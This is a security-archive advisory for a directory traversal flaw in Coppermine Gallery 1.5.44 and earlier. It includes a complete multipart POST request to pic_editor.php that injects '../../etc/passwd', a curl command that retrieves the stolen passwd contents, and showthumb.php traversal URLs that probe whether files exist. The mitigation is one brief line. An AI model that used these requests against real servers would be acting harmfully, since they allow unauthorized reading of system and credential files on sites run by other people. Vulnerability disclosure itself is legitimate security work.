exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Coppermine Gallery 1.5.44 Directory Traversal

Coppermine Gallery 1.5.44 Directory Traversal
Posted Feb 15, 2017
Authored by Hacker Fantastic

Coppermine Gallery versions 1.5.44 and below suffer from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 43fda03afc24d1a05660bc4321ec19661ba3c068b6c93e616a51d887d736f241

Coppermine Gallery 1.5.44 Directory Traversal

Change Mirror Download
Coppermine Gallery <= 1.5.44 directory traversal vulnerability
==============================================================
Coppermine is a multi-purpose fully-featured and integrated web
picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend. A directory travesal vuln
exists within the "save_thumb" function of the "crop & rotate"
image feature. This can be accessed from pic_editor.php. First
upload a file, e.g. "hackerhouse.png" to an album. This will
create a predictable file path location with your userid e.g:

http://target/cpg15x/albums/userpics/10001/hackerhouse.png

You will then send a POST request to pic_editor to manipulate
this file but replace the "new_image" with the filepath you
want to read such as "../../../../../etc/passwd". Your file
will then by copied to a predictible path location as thumb.

http://target/cpg15x/albums/userpics/10001/thumb_hackerhouse.png

To exploit this vulnerability you will need to be able to
register an account and upload files to a photo album. You
do not need admin rights to exploit this flaw. All versions
from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
to this flaw. The coppermine configuration was tested with
ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.

To protect against this exploit do not allow public registration
requests and only allow trusted users to modify images.

Example POST request
====================
POST /cpg15x/pic_editor.php HTTP/1.1
Host: target
Content-Length: 802
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
Accept: text/html,
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: <cookies>
DNT: 1
Connection: close

------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="clipval"

10
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="newimage"

../../../../../../../../../../../../../../etc/passwd
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="img_dir"

albums/edit/
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="angle"

45
------WebKitFormBoundaryAE29AdEqShlpLpDF
100
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="save_thumb"

Save as thumbnail
------WebKitFormBoundaryAE29AdEqShlpLpDF--

Example file download request
=============================
$ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
... snip

An additional directory traversal vulnerability is present
in "showthumb.php" which can be used to stat() for the existence
of files by reviewing the error returned. You must have
sufficient rights to use this feature however.

/cpg15x/showthumb.php?picfile=../../../../../../etc/passwd
/cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile

-- Hacker Fantastic
(http://www.myhackerhouse.com)

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close